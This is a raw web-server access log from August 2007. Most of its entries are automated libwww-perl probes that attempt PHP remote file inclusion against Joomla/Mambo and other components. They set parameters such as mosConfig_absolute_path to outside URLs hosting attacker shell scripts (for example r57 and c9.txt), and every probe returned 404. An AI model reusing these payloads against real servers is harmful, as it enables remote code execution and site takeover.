60.37.187.184 - - [05/Aug/2007:22:31:52 -0700] "GET /logs/access.log HTTP/1.1" 200 75610 "http://www.google.co.jp/search?num=20&hl=ja&c2coff=1&safe=off&q=122.152.140.206&btnG=%E6%A4%9C%E7%B4%A2&lr=lang_ja" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.galf.org"
65.199.17.178 - - [05/Aug/2007:22:32:13 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.199.17.178 - - [05/Aug/2007:22:32:13 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
216.55.133.106 - - [05/Aug/2007:22:43:52 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://rootssearch.net/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.55.133.106 - - [05/Aug/2007:22:43:52 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://rootssearch.net/bo.do? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.186.58.80 - - [05/Aug/2007:22:45:11 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.myoung.co.kr/board/upload/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.186.58.80 - - [05/Aug/2007:22:45:11 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.myoung.co.kr/board/upload/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.18.215.10 - - [05/Aug/2007:22:45:35 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
65.18.215.10 - - [05/Aug/2007:22:45:35 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
65.18.215.10 - - [05/Aug/2007:22:45:35 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
65.18.215.10 - - [05/Aug/2007:22:45:36 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
83.223.100.132 - - [05/Aug/2007:22:51:09 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://nge.netsons.org/hajar1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
83.223.100.132 - - [05/Aug/2007:22:51:10 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://nge.netsons.org/hajar1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
216.32.85.218 - - [05/Aug/2007:22:51:30 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.m3ks.org/sh3ll/dor? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
216.32.85.218 - - [05/Aug/2007:22:51:31 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.m3ks.org/sh3ll/dor? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
67.28.112.55 - - [05/Aug/2007:22:56:14 -0700] "GET /index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.55 - - [05/Aug/2007:22:56:15 -0700] "GET /logs/index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
88.191.39.142 - - [05/Aug/2007:22:56:54 -0700] "GET /logs/coppercop/theme.php?THEME_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
88.191.39.142 - - [05/Aug/2007:22:56:55 -0700] "GET /coppercop/theme.php?THEME_DIR=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.203.185 - - [05/Aug/2007:22:57:36 -0700] "GET /logs/index.php?pagina=http://www.ricksk8.xpg.com.br/echo.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
62.193.203.185 - - [05/Aug/2007:22:57:36 -0700] "GET /index.php?pagina=http://www.ricksk8.xpg.com.br/echo.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
202.153.128.112 - - [05/Aug/2007:22:59:56 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://nge.netsons.org/hajar1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.153.128.112 - - [05/Aug/2007:22:59:57 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://nge.netsons.org/hajar1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.199.17.178 - - [05/Aug/2007:23:01:06 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
65.199.17.178 - - [05/Aug/2007:23:01:58 -0700] "GET /logs/access_070730.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.18.44 - - [05/Aug/2007:23:19:29 -0700] "GET /logs/access.log HTTP/1.0" 200 81276 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.10.128.68 - - [05/Aug/2007:23:20:14 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.68 - - [05/Aug/2007:23:20:14 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.20.216 - - [05/Aug/2007:23:23:20 -0700] "GET /logs/access_070611.log HTTP/1.0" 200 443571 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.141.50.122 - - [05/Aug/2007:23:23:58 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lhov.nl/images/ze/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
205.234.134.224 - - [05/Aug/2007:23:24:03 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lhov.nl/images/ze/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
69.64.34.133 - - [05/Aug/2007:23:25:48 -0700] "GET //components/com_flyspray/startdown.php?file=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
61.47.61.74 - - [05/Aug/2007:23:26:16 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
61.47.61.74 - - [05/Aug/2007:23:26:17 -0700] "GET //components/com_flyspray/startdown.php?file=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.50.136.72 - - [05/Aug/2007:23:26:19 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.craighardydesigns.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
65.65.146.138 - - [05/Aug/2007:23:26:23 -0700] "GET //components/com_flyspray/startdown.php?file=http://zeronymus.hyperphp.com/freeman.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.65.146.138 - - [05/Aug/2007:23:26:23 -0700] "GET //components/com_flyspray/startdown.php?file=http://zeronymus.hyperphp.com/freeman.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
168.103.115.245 - - [05/Aug/2007:23:27:14 -0700] "GET //components/com_flyspray/startdown.php?file=http://zeronymus.php0h.com/cmds/c9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
198.65.234.237 - - [05/Aug/2007:23:30:04 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://oon.web.id/r57?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
198.65.234.237 - - [05/Aug/2007:23:30:05 -0700] "GET //components/com_flyspray/startdown.php?file=http://oon.web.id/r57?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
62.141.50.122 - - [05/Aug/2007:23:33:27 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lhov.nl/images/ze/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.50.122 - - [05/Aug/2007:23:33:28 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lhov.nl/images/ze/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.50.122 - - [05/Aug/2007:23:33:29 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lhov.nl/images/ze/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.50.122 - - [05/Aug/2007:23:33:30 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lhov.nl/images/ze/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
205.234.134.224 - - [05/Aug/2007:23:33:46 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lhov.nl/images/ze/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
205.234.134.224 - - [05/Aug/2007:23:33:46 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lhov.nl/images/ze/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
205.234.134.224 - - [05/Aug/2007:23:33:46 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lhov.nl/images/ze/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
205.234.134.224 - - [05/Aug/2007:23:33:46 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lhov.nl/images/ze/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
195.199.227.210 - - [05/Aug/2007:23:36:40 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/tmp/rhe.ganteng? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.199.227.210 - - [05/Aug/2007:23:36:40 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/tmp/rhe.ganteng? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.68.203.186 - - [05/Aug/2007:23:43:03 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ireo86.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
62.68.203.186 - - [05/Aug/2007:23:43:03 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ireo86.com/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
74.6.23.24 - - [05/Aug/2007:23:43:55 -0700] "GET /?D=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
195.199.227.210 - - [05/Aug/2007:23:53:26 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/tmp/rhe.ganteng? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.58.161.181 - - [05/Aug/2007:23:53:55 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ricksk8.xpg.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
207.58.161.181 - - [05/Aug/2007:23:53:55 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ricksk8.xpg.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
69.147.79.36 - - [06/Aug/2007:00:04:03 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Scooter/3.3" "www.galf.org"
69.147.79.36 - - [06/Aug/2007:00:04:03 -0700] "GET /revista.php HTTP/1.1" 404 275 "-" "Scooter/3.3" "www.galf.org"
74.6.23.164 - - [06/Aug/2007:00:09:49 -0700] "GET /logs/?M=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
195.199.227.210 - - [06/Aug/2007:00:12:48 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/tmp/rhe.ganteng? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.199.227.210 - - [06/Aug/2007:00:12:49 -0700] "GET /logs/access_070730.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/tmp/rhe.ganteng? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.220.202.11 - - [06/Aug/2007:00:14:24 -0700] "GET /logs/access_070730.log//phpAdsNew/view.inc.php?phpAds_path=http://www.corkingwines.com/templates/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.220.202.11 - - [06/Aug/2007:00:14:24 -0700] "GET //phpAdsNew/view.inc.php?phpAds_path=http://www.corkingwines.com/templates/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.220.202.11 - - [06/Aug/2007:00:14:24 -0700] "GET /logs//phpAdsNew/view.inc.php?phpAds_path=http://www.corkingwines.com/templates/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.28.112.54 - - [06/Aug/2007:00:19:03 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.55 - - [06/Aug/2007:00:24:52 -0700] "GET /index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.28.112.55 - - [06/Aug/2007:00:24:52 -0700] "GET /logs/index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.36.21.170 - - [06/Aug/2007:00:25:19 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.webmastermac.com/stat.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
89.36.21.170 - - [06/Aug/2007:00:25:21 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.webmastermac.com/stat.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
168.103.115.245 - - [06/Aug/2007:00:33:41 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zeronymus.php0h.com/cmds/c9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
168.103.115.245 - - [06/Aug/2007:00:35:25 -0700] "GET /index.php?go=http://zeronymus.php0h.com/cmds/c9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.161.181 - - [06/Aug/2007:00:35:46 -0700] "GET /logs/index.php?pag=http://www.ricksk8.xpg.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
207.58.161.181 - - [06/Aug/2007:00:35:46 -0700] "GET /index.php?pag=http://www.ricksk8.xpg.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
207.58.161.181 - - [06/Aug/2007:00:37:11 -0700] "GET /logs/index.php?x=http://www.ricksk8.xpg.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
207.58.161.181 - - [06/Aug/2007:00:37:11 -0700] "GET /index.php?x=http://www.ricksk8.xpg.com.br/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
64.34.170.230 - - [06/Aug/2007:00:39:28 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [06/Aug/2007:00:39:28 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.139.225.24 - - [06/Aug/2007:00:40:08 -0700] "GET /logs//phpAdsNew/view.inc.php?phpAds_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.139.225.24 - - [06/Aug/2007:00:40:09 -0700] "GET //phpAdsNew/view.inc.php?phpAds_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.139.225.24 - - [06/Aug/2007:00:44:19 -0700] "GET /logs/access_070730.log//phpAdsNew/view.inc.php?phpAds_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.24.165 - - [06/Aug/2007:00:47:19 -0700] "GET /labia/?S=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.34.164.214 - - [06/Aug/2007:00:52:01 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
64.34.170.230 - - [06/Aug/2007:00:53:16 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.170.230 - - [06/Aug/2007:00:53:16 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://servinweb.com/sohoadmin/program/webmaster/shared/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.197.226.50 - - [06/Aug/2007:00:53:37 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/evilxxx/evil? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
208.197.226.50 - - [06/Aug/2007:00:53:38 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/evilxxx/evil? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
87.118.104.72 - - [06/Aug/2007:00:54:38 -0700] "GET /logs/access_070716.log//delescluze//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.avangard.altervista.org/HiP/micmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.104.72 - - [06/Aug/2007:00:54:38 -0700] "GET //delescluze//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.avangard.altervista.org/HiP/micmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.104.72 - - [06/Aug/2007:00:54:39 -0700] "GET /logs//delescluze//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.avangard.altervista.org/HiP/micmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.55 - - [06/Aug/2007:00:55:18 -0700] "GET /index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.28.112.55 - - [06/Aug/2007:00:55:18 -0700] "GET /logs/index2.php?url_page=http://bapoz.webpark.pl/center/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.239.157.232 - - [06/Aug/2007:00:55:37 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.myoung.co.kr/board/upload/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.239.157.232 - - [06/Aug/2007:00:55:37 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.myoung.co.kr/board/upload/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.203.185 - - [06/Aug/2007:00:56:18 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ricksk8.xpg.com.br/echo.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
62.193.203.185 - - [06/Aug/2007:00:56:18 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ricksk8.xpg.com.br/echo.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
62.193.203.185 - - [06/Aug/2007:00:56:18 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ricksk8.xpg.com.br/echo.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
62.193.203.185 - - [06/Aug/2007:00:56:18 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ricksk8.xpg.com.br/echo.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
72.232.108.82 - - [06/Aug/2007:00:57:40 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
72.232.108.82 - - [06/Aug/2007:00:57:40 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebtown.com/nusay/1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.807" "www.galf.org"
66.59.75.99 - - [06/Aug/2007:00:57:56 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.59.75.99 - - [06/Aug/2007:00:57:56 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
88.80.208.155 - - [06/Aug/2007:00:58:56 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
88.80.208.155 - - [06/Aug/2007:00:58:56 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/c.ar?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:00:58:57 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
81.209.167.203 - - [06/Aug/2007:00:58:57 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
208.69.192.185 - - [06/Aug/2007:00:58:58 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.teamkiss.net/aca/file/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.69.192.185 - - [06/Aug/2007:00:58:58 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.teamkiss.net/aca/file/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.69.192.185 - - [06/Aug/2007:00:58:58 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.teamkiss.net/aca/file/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.69.192.185 - - [06/Aug/2007:00:59:03 -0700] "GET /logs/access_070723.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.teamkiss.net/aca/file/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
208.69.192.185 - - [06/Aug/2007:00:59:03 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.teamkiss.net/aca/file/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
208.69.192.185 - - [06/Aug/2007:00:59:03 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.teamkiss.net/aca/file/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.70.58 - - [06/Aug/2007:00:59:04 -0700] "GET /?S=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
208.69.192.185 - - [06/Aug/2007:00:59:19 -0700] "GET /logs/access_070730.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.teamkiss.net/aca/file/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.69.192.185 - - [06/Aug/2007:00:59:20 -0700] "GET /logs/access_070730.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.teamkiss.net/aca/file/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
